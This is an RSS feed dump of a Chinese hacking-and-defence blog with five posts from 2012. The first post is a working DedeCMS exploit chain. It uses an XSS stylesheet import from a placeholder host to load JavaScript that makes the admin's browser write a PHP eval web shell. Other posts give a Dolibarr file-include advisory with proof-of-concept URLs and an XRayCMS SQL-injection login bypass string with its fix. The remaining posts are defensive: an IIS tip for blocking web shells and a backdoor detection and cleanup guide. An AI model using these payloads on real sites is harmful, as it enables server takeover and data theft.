Tue, 14 Feb 2012 04:22:39 GMT影子鹰安全网络-主站技术BLOG影子鹰安全网络-主站技术BLOGhttp://www.feedsky.com/feed/cnyzy/sc/gif影子鹰安全网络-主站技术BLOGhttp://www.cnyzy.cnhttp://www.cnyzy.cnzh-cnPowered by L-Blog, Some Rights Reserved By AlparTue, 14 Feb 2012 04:22:39 GMTDEDECMS XSS GETSHeLL 通杀所有版本http://www.cnyzy.cn/blogview.asp?logID=1807<p id=fp>&lt;style&gt;@import´<a href="http://xxx.com/xss.css" target="_blank">http://xxx.com/xss.css</a>´;&lt;/style&gt;&nbsp;&nbsp;<br><br>&nbsp;&nbsp;&nbsp;&nbsp;<br><br>&nbsp;xss.css内容:&nbsp;&nbsp;<br><br>&nbsp;body{background-image:url(´javascript:document.write(“&lt;script&nbsp;src=http://xxx.com/logo.jpg&gt;&lt;/script&gt;”)´)}&nbsp;&nbsp;<br><br>&nbsp;&nbsp;&nbsp;&nbsp;<br><br>&nbsp;logo.jpg内容:&nbsp;&nbsp;<br><br>&nbsp;&nbsp;&nbsp;&nbsp;<br><br>&nbsp;var&nbsp;request&nbsp;=&nbsp;false;&nbsp;&nbsp;<br><br>&nbsp;if(window.XMLHttpRequest)&nbsp;{&nbsp;&nbsp;<br><br>&nbsp;request&nbsp;=&nbsp;new&nbsp;XMLHttpRequest();&nbsp;&nbsp;<br><br>&nbsp;if(request.overrideMimeType)&nbsp;{&nbsp;&nbsp;<br><br>&nbsp;request.overrideMimeType(´text/xml´);&nbsp;&nbsp;<br><br>&nbsp;}&nbsp;&nbsp;<br><br>&nbsp;}&nbsp;else&nbsp;if(window.ActiveXObject)&nbsp;{&nbsp;&nbsp;<br><br>&nbsp;var&nbsp;versions&nbsp;=&nbsp;[´<a href="http://www.microsoft.com/china/homepage/ms.htm" target="_blank"><img src="images/keywords/microsoft.gif" border="0" align="absmiddle"> Microsoft</a>.XMLHTTP´,&nbsp;´MSXML.XMLHTTP´,&nbsp;´<a href="http://www.microsoft.com/china/homepage/ms.htm" target="_blank"><img src="images/keywords/microsoft.gif" border="0" align="absmiddle"> Microsoft</a>.XMLHTTP´,&nbsp;´Msxml2.XMLHTTP.7.0´,´Msxml2.XMLHTTP.6.0´,´Msxml2.XMLHTTP.5.0´,&nbsp;´Msxml2.XMLHTTP.4.0´,&nbsp;´MSXML2.XMLHTTP.3.0´,&nbsp;´MSXML2.XMLHTTP´];&nbsp;&nbsp;<br><br>&nbsp;for(var&nbsp;i=0;&nbsp;i&lt;versions.length;&nbsp;i++)&nbsp;{&nbsp;&nbsp;<br><br>&nbsp;try&nbsp;{&nbsp;&nbsp;<br><br>&nbsp;request&nbsp;=&nbsp;new&nbsp;ActiveXObject(versions[i]);&nbsp;&nbsp;<br><br>&nbsp;}&nbsp;catch(e)&nbsp;{}&nbsp;&nbsp;<br><br>&nbsp;}&nbsp;&nbsp;<br><br>&nbsp;}&nbsp;&nbsp;<br><br>&nbsp;xmlhttp=request;&nbsp;&nbsp;<br><br>&nbsp;function&nbsp;getFolder(&nbsp;url&nbsp;){&nbsp;&nbsp;<br><br>&nbsp;obj&nbsp;=&nbsp;url.split(´/´)&nbsp;&nbsp;<br><br>&nbsp;return&nbsp;obj[obj.length-2]&nbsp;&nbsp;<br><br>&nbsp;}&nbsp;&nbsp;<br><br>&nbsp;oUrl&nbsp;=&nbsp;top.location.href;&nbsp;&nbsp;<br><br>&nbsp;u&nbsp;=&nbsp;getFolder(oUrl);&nbsp;&nbsp;<br><br>&nbsp;add_admin();&nbsp;&nbsp;<br><br>&nbsp;function&nbsp;add_admin(){&nbsp;&nbsp;<br><br>&nbsp;var&nbsp;url=&nbsp;“/”+u+”/sys_sql_query.php”;&nbsp;&nbsp;<br><br>&nbsp;var&nbsp;params&nbsp;=”fmdo=edit&amp;backurl=&amp;activepath=%2Fdata&amp;filename=haris.php&amp;str=%3C%3Fphp+eval%28%24_POST%5Bcmd%5D%29%3F%3E&amp;B1=++%E4%BF%9D+%E5%AD%98++”;&nbsp;&nbsp;<br><br>&nbsp;xmlhttp.open(“POST”,&nbsp;url,&nbsp;true);&nbsp;&nbsp;<br><br>&nbsp;xmlhttp.setRequestHeader(“Content-type”,&nbsp;“application/x-www-form-urlencoded”);&nbsp;&nbsp;<br><br>&nbsp;xmlhttp.setRequestHeader(“Content-length”,&nbsp;params.length);&nbsp;&nbsp;<br><br>&nbsp;xmlhttp.setRequestHeader(“Connection”,&nbsp;“Keep-Alive”);&nbsp;&nbsp;<br><br>&nbsp;xmlhttp.send(params);&nbsp;&nbsp;<br><br>&nbsp;}&nbsp;<br><br>&nbsp;<br>&nbsp;<br>&nbsp;<br>&nbsp;<br>1&nbsp;记住这个js脚本吧,get&nbsp;post&nbsp;cookies都可以用这种模式。&nbsp;&nbsp;<br><br>2&nbsp;这个ajax写得很完善.(新浪蠕虫依赖jquery直接使用ajax).&nbsp;<br></p><img src="http://www1.feedsky.com/t1/605529337/cnyzy/feedsky/s.gif?r=http://www.cnyzy.cn/blogview.asp?logID=1807" border="0" height="0" width="0" style="position:absolute" />http://www.cnyzy.cn/trackback.asp?tbID=1807http://www.cnyzy.cn/blogfeed.asp?logID=1807<p id=fp>&lt;style&gt;@import´<a href="http://xxx.com/xss.css" target="_blank">http://xxx.com/xss.css</a>´;&lt;/style&gt;&nbsp;&nbsp;<br><br>&nbsp;&nbsp;&nbsp;&nbsp;<br><br>&nbsp;xss.css内容:&nbsp;&nbsp;</p><img src="http://www1.feedsky.com/t1/605529337/cnyzy/feedsky/s.gif?r=http://www.cnyzy.cn/blogview.asp?logID=1807" border="0" height="0" width="0" style="position:absolute" />黑客攻防Tue, 14 Feb 2012 12:22:39 +0800kawenhttp://www.cnyzy.cn/blogview.asp?logID=1807#commenthttp://www.cnyzy.cn/blogview.asp?logID=1807kawenhttp://www.cnyzy.cn/blogview.asp?logID=1807http://www.cnyzy.cn/blogfeed.aspfeedsky/cnyzy/~1471012/605529337/1477126Dolibarr CMS v3.2.0 Alphahttp://www.cnyzy.cn/blogview.asp?logID=1806<p id=fp><strong>Dolibarr&nbsp;CMS&nbsp;v3.2.0&nbsp;Alpha&nbsp;-&nbsp;File&nbsp;Include&nbsp;Vulnerabilities</strong><br><br>Title:&nbsp;&nbsp;<br><br>======&nbsp;&nbsp;<br><br>Dolibarr&nbsp;CMS&nbsp;v3.2.0&nbsp;Alpha&nbsp;-&nbsp;File&nbsp;Include&nbsp;Vulnerabilities&nbsp;&nbsp;<br><br>Date:&nbsp;&nbsp;<br><br>=====&nbsp;&nbsp;<br><br>2012-02-07&nbsp;&nbsp;<br><br>References:&nbsp;&nbsp;<br><br>===========&nbsp;&nbsp;<br><br><a href="http://www.vulnerability-lab.com/get_content.php?id=428&nbsp;&nbsp;" target="_blank">http://www.vulnerability-lab.com/get_content.php?id=428&nbsp;&nbsp;</a><br><br>VL-ID:&nbsp;&nbsp;<br><br>=====&nbsp;&nbsp;<br><br>428&nbsp;&nbsp;<br><br>Introduction:&nbsp;&nbsp;<br><br>=============&nbsp;&nbsp;<br><br>Dolibarr&nbsp;ERP&nbsp;&amp;&nbsp;CRM&nbsp;is&nbsp;a&nbsp;modern&nbsp;software&nbsp;to&nbsp;manage&nbsp;your&nbsp;company&nbsp;or&nbsp;foundation&nbsp;activity&nbsp;(contacts,&nbsp;suppliers,&nbsp;&nbsp;<br><br>invoices,&nbsp;orders,&nbsp;stocks,&nbsp;agenda,&nbsp;...).&nbsp;It&nbsp;s&nbsp;an&nbsp;opensource&nbsp;free&nbsp;software&nbsp;designed&nbsp;for&nbsp;small&nbsp;and&nbsp;medium&nbsp;&nbsp;<br><br>companies,&nbsp;foundations&nbsp;and&nbsp;freelances.&nbsp;You&nbsp;can&nbsp;install,&nbsp;use&nbsp;and&nbsp;distribute&nbsp;it&nbsp;as&nbsp;a&nbsp;standalone&nbsp;application&nbsp;&nbsp;<br><br>or&nbsp;as&nbsp;a&nbsp;web&nbsp;application&nbsp;(on&nbsp;mutualized&nbsp;or&nbsp;dedicated&nbsp;server,&nbsp;or&nbsp;on&nbsp;SaaS&nbsp;or&nbsp;Cloud&nbsp;solutions)&nbsp;and&nbsp;use&nbsp;it&nbsp;with&nbsp;&nbsp;<br><br>any&nbsp;devices&nbsp;(desktop,&nbsp;smartphone,&nbsp;tablet).&nbsp;&nbsp;<br><br>(Copy&nbsp;of&nbsp;the&nbsp;Vendor&nbsp;Homepage:&nbsp;<a href="http://www.dolibarr.org/)&nbsp;&nbsp;" target="_blank">http://www.dolibarr.org/)&nbsp;&nbsp;</a><br><br>Abstract:&nbsp;&nbsp;<br><br>=========&nbsp;&nbsp;<br><br>Vulnerability-Lab&nbsp;researcher&nbsp;discovered&nbsp;a&nbsp;multiple&nbsp;File&nbsp;Include&nbsp;Vulnerabilities&nbsp;on&nbsp;Dolibarrs&nbsp;CMS&nbsp;v3.2.0&nbsp;Alpha.&nbsp;&nbsp;<br><br>Report-Timeline:&nbsp;&nbsp;<br><br>================&nbsp;&nbsp;<br><br>2011-02-08:&nbsp;Public&nbsp;or&nbsp;Non-Public&nbsp;Disclosure&nbsp;&nbsp;<br><br>Status:&nbsp;&nbsp;<br><br>========&nbsp;&nbsp;<br><br>Published&nbsp;&nbsp;<br><br>Exploitation-Technique:&nbsp;&nbsp;<br><br>=======================&nbsp;&nbsp;<br><br>Remote&nbsp;&nbsp;<br><br>Severity:&nbsp;&nbsp;<br><br>=========&nbsp;&nbsp;<br><br>Critical&nbsp;&nbsp;<br><br>Details:&nbsp;&nbsp;<br><br>========&nbsp;&nbsp;<br><br>Multiple&nbsp;File&nbsp;Include&nbsp;Vulnerabilities&nbsp;are&nbsp;detected&nbsp;on&nbsp;Dolibarrs&nbsp;Content&nbsp;Management&nbsp;System&nbsp;v3.2.0&nbsp;Alpha.&nbsp;&nbsp;<br><br>The&nbsp;vulnerability&nbsp;allows&nbsp;an&nbsp;attacker&nbsp;(remote)&nbsp;or&nbsp;local&nbsp;low&nbsp;privileged&nbsp;user&nbsp;account&nbsp;to&nbsp;request&nbsp;local&nbsp;web-server&nbsp;&nbsp;<br><br>or&nbsp;system&nbsp;files.&nbsp;&nbsp;Successful&nbsp;exploitation&nbsp;of&nbsp;the&nbsp;vulnerability&nbsp;results&nbsp;in&nbsp;dbms&nbsp;&amp;&nbsp;application&nbsp;compromise.&nbsp;&nbsp;<br><br>Vulnerable&nbsp;Module(s):&nbsp;&nbsp;<br><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;[+]&nbsp;?modulepart=project&amp;file=&nbsp;&nbsp;<br><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;[+]&nbsp;?action=create&amp;actioncode=AC_RDV&amp;contactid=1&amp;socid=1&amp;backtopage=&nbsp;&nbsp;<br><br>Picture(s):&nbsp;&nbsp;<br><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;../1.png&nbsp;&nbsp;<br><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;../2.png&nbsp;&nbsp;<br><br>Proof&nbsp;of&nbsp;Concept:&nbsp;&nbsp;<br><br>=================&nbsp;&nbsp;<br><br>The&nbsp;vulnerabilities&nbsp;can&nbsp;be&nbsp;exploited&nbsp;by&nbsp;remote&nbsp;attackers&nbsp;or&nbsp;local&nbsp;low&nbsp;privileged&nbsp;user&nbsp;accounts.&nbsp;For&nbsp;demonstration&nbsp;or&nbsp;reproduce&nbsp;...&nbsp;&nbsp;<br><br><a href="http://server/document.php?modulepart=project&amp;file=../" target="_blank">http://server/document.php?modulepart=project&amp;file=../</a>[FILE&nbsp;INCLUDE&nbsp;VULNERABILITY!]&nbsp;&nbsp;<br><br><a href="http://server/comm/action/fiche.php?action=create&amp;actioncode=AC_RDV&amp;contactid=1&amp;socid=1&amp;backtopage=../common/" target="_blank">http://server/comm/action/fiche.php?action=create&amp;actioncode=AC_RDV&amp;contactid=1&amp;socid=1&amp;backtopage=../common/</a>[FILE&nbsp;INCLUDE&nbsp;VULNERABILITY!]&nbsp;&nbsp;<br><br>Risk:&nbsp;&nbsp;<br><br>=====&nbsp;&nbsp;<br><br>The&nbsp;security&nbsp;riks&nbsp;of&nbsp;the&nbsp;file&nbsp;include&nbsp;vulnerabilities&nbsp;are&nbsp;estimated&nbsp;as&nbsp;high(+).&nbsp;&nbsp;<br><br>Credits:&nbsp;&nbsp;<br><br>========&nbsp;&nbsp;<br><br>Vulnerability&nbsp;Research&nbsp;Laboratory&nbsp;-&nbsp;Benjamin&nbsp;Kunz&nbsp;Mejri&nbsp;&amp;&nbsp;Ucha&nbsp;Gobejishvili&nbsp;(longrifle0x)&nbsp;&nbsp;<br><br>Disclaimer:&nbsp;&nbsp;<br><br>===========&nbsp;&nbsp;<br><br>The&nbsp;information&nbsp;provided&nbsp;in&nbsp;this&nbsp;advisory&nbsp;is&nbsp;provided&nbsp;as&nbsp;it&nbsp;is&nbsp;without&nbsp;any&nbsp;warranty.&nbsp;Vulnerability-Lab&nbsp;disclaims&nbsp;all&nbsp;warranties,&nbsp;&nbsp;<br><br>either&nbsp;expressed&nbsp;or&nbsp;implied,&nbsp;including&nbsp;the&nbsp;warranties&nbsp;of&nbsp;merchantability&nbsp;and&nbsp;capability&nbsp;for&nbsp;a&nbsp;particular&nbsp;purpose.&nbsp;Vulnerability-&nbsp;&nbsp;<br><br>Lab&nbsp;or&nbsp;its&nbsp;suppliers&nbsp;are&nbsp;not&nbsp;liable&nbsp;in&nbsp;any&nbsp;case&nbsp;of&nbsp;damage,&nbsp;including&nbsp;direct,&nbsp;indirect,&nbsp;incidental,&nbsp;consequential&nbsp;loss&nbsp;of&nbsp;business&nbsp;&nbsp;<br><br>profits&nbsp;or&nbsp;special&nbsp;damages,&nbsp;even&nbsp;if&nbsp;Vulnerability-Lab&nbsp;or&nbsp;its&nbsp;suppliers&nbsp;have&nbsp;been&nbsp;advised&nbsp;of&nbsp;the&nbsp;possibility&nbsp;of&nbsp;such&nbsp;damages.&nbsp;Some&nbsp;&nbsp;<br><br>states&nbsp;do&nbsp;not&nbsp;allow&nbsp;the&nbsp;exclusion&nbsp;or&nbsp;limitation&nbsp;of&nbsp;liability&nbsp;for&nbsp;consequential&nbsp;or&nbsp;incidental&nbsp;damages&nbsp;so&nbsp;the&nbsp;foregoing&nbsp;limitation&nbsp;&nbsp;<br><br>may&nbsp;not&nbsp;apply.&nbsp;Any&nbsp;modified&nbsp;copy&nbsp;or&nbsp;reproduction,&nbsp;including&nbsp;partially&nbsp;usages,&nbsp;of&nbsp;this&nbsp;file&nbsp;requires&nbsp;authorization&nbsp;from&nbsp;Vulnerability-&nbsp;&nbsp;<br><br>Lab.&nbsp;Permission&nbsp;to&nbsp;electronically&nbsp;redistribute&nbsp;this&nbsp;alert&nbsp;in&nbsp;its&nbsp;unmodified&nbsp;form&nbsp;is&nbsp;granted.&nbsp;All&nbsp;other&nbsp;rights,&nbsp;including&nbsp;the&nbsp;use&nbsp;of&nbsp;&nbsp;<br><br>other&nbsp;media,&nbsp;are&nbsp;reserved&nbsp;by&nbsp;Vulnerability-Lab&nbsp;or&nbsp;its&nbsp;suppliers.&nbsp;&nbsp;<br><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Copyright&nbsp;�&nbsp;2011|Vulnerability-Lab&nbsp;&nbsp;<br><br>--&nbsp;&nbsp;<br><br>Website:&nbsp;www.vulnerability-lab.com&nbsp;;&nbsp;vuln-lab.com&nbsp;or&nbsp;vuln-db.com&nbsp;&nbsp;<br><br>Contact:&nbsp;admin@vulnerability-lab.com&nbsp;or&nbsp;support@vulnerability-lab.com&nbsp;<br></p><img src="http://www1.feedsky.com/t1/604936848/cnyzy/feedsky/s.gif?r=http://www.cnyzy.cn/blogview.asp?logID=1806" border="0" height="0" width="0" style="position:absolute" />http://www.cnyzy.cn/trackback.asp?tbID=1806http://www.cnyzy.cn/blogfeed.asp?logID=1806<p id=fp><strong>Dolibarr&nbsp;CMS&nbsp;v3.2.0&nbsp;Alpha&nbsp;-&nbsp;File&nbsp;Include&nbsp;Vulnerabilities</strong><br><br>Title:&nbsp;&nbsp;<br><br>======&nbsp;&nbsp;</p><img src="http://www1.feedsky.com/t1/604936848/cnyzy/feedsky/s.gif?r=http://www.cnyzy.cn/blogview.asp?logID=1806" border="0" height="0" width="0" style="position:absolute" />黑客攻防Tue, 14 Feb 2012 12:22:39 +0800kawenhttp://www.cnyzy.cn/blogview.asp?logID=1806#commenthttp://www.cnyzy.cn/blogview.asp?logID=1806kawenhttp://www.cnyzy.cn/blogview.asp?logID=1806http://www.cnyzy.cn/blogfeed.aspfeedsky/cnyzy/~1471012/604936848/1477126让webshell无法运行http://www.cnyzy.cn/blogview.asp?logID=1805<p id=fp>其实就是运行IIS的对目录文件夹的执行权限设置来达到让webshell无法运行的目的<br>您试图从目录中执行&nbsp;CGI、ISAPI&nbsp;或其他可执行程序,但该目录不允许执行程序。<br>Interneter服务器管理----IIS中站点目录右键----属性----在主目录中<br>查看“执行权限”一般设置为“纯脚本”,脚本文件才能正常运行,设置为“无”则不能运行<br>&nbsp;<br>把一些图片目录,设置“执行权限”为“无”,即使webshell能上传到此目录,也无法运行!<br>现在很多空间商已经可以设置这样的“执行权限”,但貌似只能设置根目录的,不过已经很好了!<br>这样可以比较有效的防止被别人拿到webshell,但也不是绝对的!<br>有时候也可以构造上传到其他目录或者上一级目录,攻防无绝对!<br></p><img src="http://www1.feedsky.com/t1/604356892/cnyzy/feedsky/s.gif?r=http://www.cnyzy.cn/blogview.asp?logID=1805" border="0" height="0" width="0" style="position:absolute" />http://www.cnyzy.cn/trackback.asp?tbID=1805http://www.cnyzy.cn/blogfeed.asp?logID=1805<p id=fp>其实就是运行IIS的对目录文件夹的执行权限设置来达到让webshell无法运行的目的<br>您试图从目录中执行&nbsp;CGI、ISAPI&nbsp;或其他可执行程序,但该目录不允许执行程序。<br>Interneter服务器管理----IIS中站点目录右键----属性----在主目录中<br>查看“执行权限”一般设置为“纯脚本”,脚本文件才能正常运行,设置为“无”则不能运行<br>&nbsp;</p><img src="http://www1.feedsky.com/t1/604356892/cnyzy/feedsky/s.gif?r=http://www.cnyzy.cn/blogview.asp?logID=1805" border="0" height="0" width="0" style="position:absolute" />黑客攻防Tue, 14 Feb 2012 12:22:39 +0800kawenhttp://www.cnyzy.cn/blogview.asp?logID=1805#commenthttp://www.cnyzy.cn/blogview.asp?logID=1805kawenhttp://www.cnyzy.cn/blogview.asp?logID=1805http://www.cnyzy.cn/blogfeed.aspfeedsky/cnyzy/~1471012/604356892/1477126XRayCMS 1.1.1 SQL Injection Vulnerabilityhttp://www.cnyzy.cn/blogview.asp?logID=1804<p id=fp>#&nbsp;Exploit&nbsp;Title:&nbsp;XRayCMS&nbsp;1.1.1&nbsp;SQL&nbsp;Injection&nbsp;Vulnerability&nbsp;&nbsp;<br><br>#&nbsp;Date:&nbsp;2/5/2012&nbsp;&nbsp;<br><br>#&nbsp;Author:&nbsp;chap0&nbsp;&nbsp;<br><br>#&nbsp;Software&nbsp;Link:&nbsp;<a href="http://sourceforge.net/projects/xraycms/files/latest/download&nbsp;&nbsp;" target="_blank">http://sourceforge.net/projects/xraycms/files/latest/download&nbsp;&nbsp;</a><br><br>#&nbsp;Version:&nbsp;1.1.1&nbsp;&nbsp;<br><br>#&nbsp;Tested&nbsp;on:&nbsp;Ubuntu&nbsp;&nbsp;<br><br>XRay&nbsp;CMS&nbsp;is&nbsp;vulnerable&nbsp;to&nbsp;a&nbsp;SQL&nbsp;Injection&nbsp;attack&nbsp;which&nbsp;allows&nbsp;&nbsp;<br><br>authentication&nbsp;bypass&nbsp;into&nbsp;the&nbsp;admins&nbsp;account.&nbsp;If&nbsp;a&nbsp;malicious&nbsp;&nbsp;<br><br>user&nbsp;supplies&nbsp;&#39;&nbsp;or&nbsp;1=1#&nbsp;into&nbsp;the&nbsp;applications&nbsp;user&nbsp;name&nbsp;field&nbsp;&nbsp;<br><br>they&nbsp;will&nbsp;be&nbsp;logged&nbsp;into&nbsp;the&nbsp;applications&nbsp;admin&nbsp;account.&nbsp;&nbsp;<br><br>Jan&nbsp;29,&nbsp;2012&nbsp;–&nbsp;Contacted&nbsp;Vendor&nbsp;No&nbsp;Response&nbsp;&nbsp;<br><br>Feb&nbsp;05,&nbsp;2012&nbsp;–&nbsp;Public&nbsp;Disclosure&nbsp;&nbsp;<br><br>Since&nbsp;the&nbsp;vendor&nbsp;did&nbsp;not&nbsp;reply&nbsp;we&nbsp;attempted&nbsp;to&nbsp;create&nbsp;our&nbsp;own&nbsp;&nbsp;<br><br>fixes&nbsp;for&nbsp;this&nbsp;issue.&nbsp;The&nbsp;vulnerability&nbsp;exist&nbsp;in&nbsp;“login2.php”&nbsp;&nbsp;<br><br>on&nbsp;lines&nbsp;20&nbsp;and&nbsp;21.&nbsp;&nbsp;<br><br>17&nbsp;&nbsp;if(!isset($_POST[&#39;username&#39;]))&nbsp;header(&quot;Location:&nbsp;login.php?error_username&quot;);&nbsp;&nbsp;<br><br>18&nbsp;&nbsp;if(!isset($_POST[&#39;password&#39;]))&nbsp;header(&quot;Location:&nbsp;login.php?error_password&quot;);&nbsp;&nbsp;<br><br>19&nbsp;&nbsp;<br><br>20&nbsp;&nbsp;$user&nbsp;=&nbsp;$_POST[&#39;username&#39;];&nbsp;&nbsp;<br><br>21&nbsp;&nbsp;$pass&nbsp;=&nbsp;$_POST[&#39;password&#39;];&nbsp;&nbsp;<br><br>If&nbsp;the&nbsp;lines&nbsp;20&nbsp;and&nbsp;21&nbsp;are&nbsp;changed&nbsp;to:&nbsp;&nbsp;<br><br>$user&nbsp;=&nbsp;mysql_real_escape_string($_POST[&#39;username&#39;]);&nbsp;&nbsp;<br><br>$pass&nbsp;=&nbsp;mysql_real_escape_string($_POST[&#39;password&#39;]);&nbsp;&nbsp;<br><br>This&nbsp;will&nbsp;prevent&nbsp;the&nbsp;sql&nbsp;injection&nbsp;from&nbsp;happening&nbsp;in&nbsp;the&nbsp;user&nbsp;name&nbsp;field.&nbsp;<br></p><img src="http://www1.feedsky.com/t1/603220388/cnyzy/feedsky/s.gif?r=http://www.cnyzy.cn/blogview.asp?logID=1804" border="0" height="0" width="0" style="position:absolute" />http://www.cnyzy.cn/trackback.asp?tbID=1804http://www.cnyzy.cn/blogfeed.asp?logID=1804<p id=fp>#&nbsp;Exploit&nbsp;Title:&nbsp;XRayCMS&nbsp;1.1.1&nbsp;SQL&nbsp;Injection&nbsp;Vulnerability&nbsp;&nbsp;<br><br>#&nbsp;Date:&nbsp;2/5/2012&nbsp;&nbsp;<br><br>#&nbsp;Author:&nbsp;chap0&nbsp;&nbsp;</p><img src="http://www1.feedsky.com/t1/603220388/cnyzy/feedsky/s.gif?r=http://www.cnyzy.cn/blogview.asp?logID=1804" border="0" height="0" width="0" style="position:absolute" />黑客攻防Tue, 14 Feb 2012 12:22:39 +0800kawenhttp://www.cnyzy.cn/blogview.asp?logID=1804#commenthttp://www.cnyzy.cn/blogview.asp?logID=1804kawenhttp://www.cnyzy.cn/blogview.asp?logID=1804http://www.cnyzy.cn/blogfeed.aspfeedsky/cnyzy/~1471012/603220388/1477126putty和WinSCP后门检查及清理方式http://www.cnyzy.cn/blogview.asp?logID=1803<p id=fp>检查及清理方式<br>&nbsp;<br>  检查/var/log&nbsp;是否被删除#&nbsp;/usr/bin/stat&nbsp;/var/log<br>  如果被删除了,说明中招了<br>  查看/var/log&nbsp;文件夹内容#&nbsp;ls&nbsp;-al&nbsp;/var/log<br>  如果文件很少,说明中招了<br>  监控名称为fsyslog,osysllog&nbsp;的进程#&nbsp;/usr/bin/watch&nbsp;-n&nbsp;1&nbsp;/bin/ps&nbsp;-AFZ&nbsp;f&nbsp;\|&nbsp;/bin/grep&nbsp;syslog<br>  如果有名称为fsyslog或osyslog的进程,说明中招了,注意不要和正常的系统日志进程混淆<br>  检查/etc/init.d/sshd&nbsp;的文件头是否被篡改过#&nbsp;/usr/bin/head&nbsp;/etc/init.d/sshd<br>  检查/etc/init.d/sendmail&nbsp;的文件头是否被篡改过#&nbsp;/usr/bin/head&nbsp;/etc/init.d/sendmail<br>  检查是否有对外链接的82&nbsp;端口#&nbsp;/bin/netstat&nbsp;-anp&nbsp;|&nbsp;/bin/grep&nbsp;&#39;:82&#39;<br>  如果有,而你又没设置过,说明已经中招了<br>  检查是否有链接到98.126.55.226&nbsp;的链接#&nbsp;/bin/netstat&nbsp;-anp&nbsp;|&nbsp;/bin/grep&nbsp;&#39;98\.&#39;&nbsp;--color<br>  如果有,说明已经中招了<br>  检查/etc&nbsp;文件夹下的隐藏文件.fsyslog&nbsp;.osyslog,检查/lib&nbsp;文件夹下的隐藏文件.fsyslog&nbsp;.osyslog<br>  /usr/bin/find&nbsp;/etc&nbsp;-name&nbsp;&#39;.*&#39;&nbsp;-printf&nbsp;&#39;%a&nbsp;%c&nbsp;%t&nbsp;%M&nbsp;%g:%u&nbsp;%p\n&#39;&nbsp;|&nbsp;/bin/grep&nbsp;2012&nbsp;--color<br>  /usr/bin/find&nbsp;/lib&nbsp;-name&nbsp;&#39;.*&#39;&nbsp;-printf&nbsp;&#39;%a&nbsp;%c&nbsp;%t&nbsp;%M&nbsp;%g:%u&nbsp;%p\n&#39;&nbsp;|&nbsp;/bin/grep&nbsp;2012&nbsp;--color<br>  /usr/bin/find&nbsp;/etc&nbsp;-name&nbsp;&#39;syslog&#39;&nbsp;-printf&nbsp;&#39;%a&nbsp;%c&nbsp;%t&nbsp;%M&nbsp;%g:%u&nbsp;%p\n&#39;&nbsp;|&nbsp;/bin/grep&nbsp;2012&nbsp;--color<br>  /usr/bin/find&nbsp;/lib&nbsp;-name&nbsp;&#39;syslog&#39;&nbsp;-printf&nbsp;&#39;%a&nbsp;%c&nbsp;%t&nbsp;%M&nbsp;%g:%u&nbsp;%p\n&#39;&nbsp;|&nbsp;/bin/grep&nbsp;2012&nbsp;--color<br>  如果有近期修改过的名称包含fsyslog或osyslog的文件,说明已经中招了<br>&nbsp;<br>恢复系统日志<br>&nbsp;<br>  查看系统日志文件夹#&nbsp;ls&nbsp;-al&nbsp;/var/log<br>  创建系统日志文件夹#&nbsp;/bin/mkdir&nbsp;/var/log<br>  如果被删除的话需要创建<br>  查看系统日志服务#&nbsp;/usr/bin/find&nbsp;/etc/init.d/&nbsp;-name&nbsp;&#39;*log*&#39;<br>  需要区分出你的服务器所使用的日志服务<br>  关闭系统日志服务#&nbsp;/sbin/service&nbsp;syslog&nbsp;stop<br>  你的服务器的日志服务的名称可能是另外一个名字<br>  启动系统日志服务#&nbsp;/sbin/service&nbsp;syslog&nbsp;start<br>  你的服务器的日志服务的名称可能是另外一个名字<br>  创建错误登录日志文件#&nbsp;/bin/touch&nbsp;/var/log/btmp<br>  设置错误登录日志文件用户组#&nbsp;/bin/chown&nbsp;root:utmp&nbsp;/var/log/btmp<br>  设置错误登录日志文件权限#&nbsp;/bin/chmod&nbsp;600&nbsp;/var/log/btmp<br>  创建登录日志文件#&nbsp;/bin/touch&nbsp;/var/log/wtmp<br>  设置登录日志文件用户组#&nbsp;/bin/chown&nbsp;root:utmp&nbsp;/var/log/wtmp<br>  设置登录日志文件权限#&nbsp;/bin/chmod&nbsp;664&nbsp;/var/log/wtmp<br>&nbsp;<br>恢复SELinux(安全增强Linux)设置<br>&nbsp;<br>  查看SELinux&nbsp;状态#&nbsp;/usr/sbin/sestatus&nbsp;-v<br>  检查/var/log&nbsp;文件夹的安全上下文#&nbsp;/sbin/restorecon&nbsp;-rn&nbsp;-vv&nbsp;/var/log<br>  恢复/var/log&nbsp;文件夹的安全上下文#&nbsp;/sbin/restorecon&nbsp;-r&nbsp;-vv&nbsp;/var/log<br>  检查/etc&nbsp;文件夹的安全上下文#&nbsp;/sbin/restorecon&nbsp;-rn&nbsp;-vv&nbsp;/etc&nbsp;2&gt;/dev/null<br>  恢复/etc&nbsp;文件夹的安全上下文#&nbsp;/sbin/restorecon&nbsp;-r&nbsp;-vv&nbsp;/etc&nbsp;2&gt;/dev/null<br>  检查/lib&nbsp;文件夹的安全上下文#&nbsp;/sbin/restorecon&nbsp;-rn&nbsp;-vv&nbsp;/lib&nbsp;2&gt;/dev/null<br></p><img src="http://www1.feedsky.com/t1/603220389/cnyzy/feedsky/s.gif?r=http://www.cnyzy.cn/blogview.asp?logID=1803" border="0" height="0" width="0" style="position:absolute" />http://www.cnyzy.cn/trackback.asp?tbID=1803http://www.cnyzy.cn/blogfeed.asp?logID=1803<p id=fp>检查及清理方式<br>&nbsp;<br>  检查/var/log&nbsp;是否被删除#&nbsp;/usr/bin/stat&nbsp;/var/log<br>  如果被删除了,说明中招了<br>  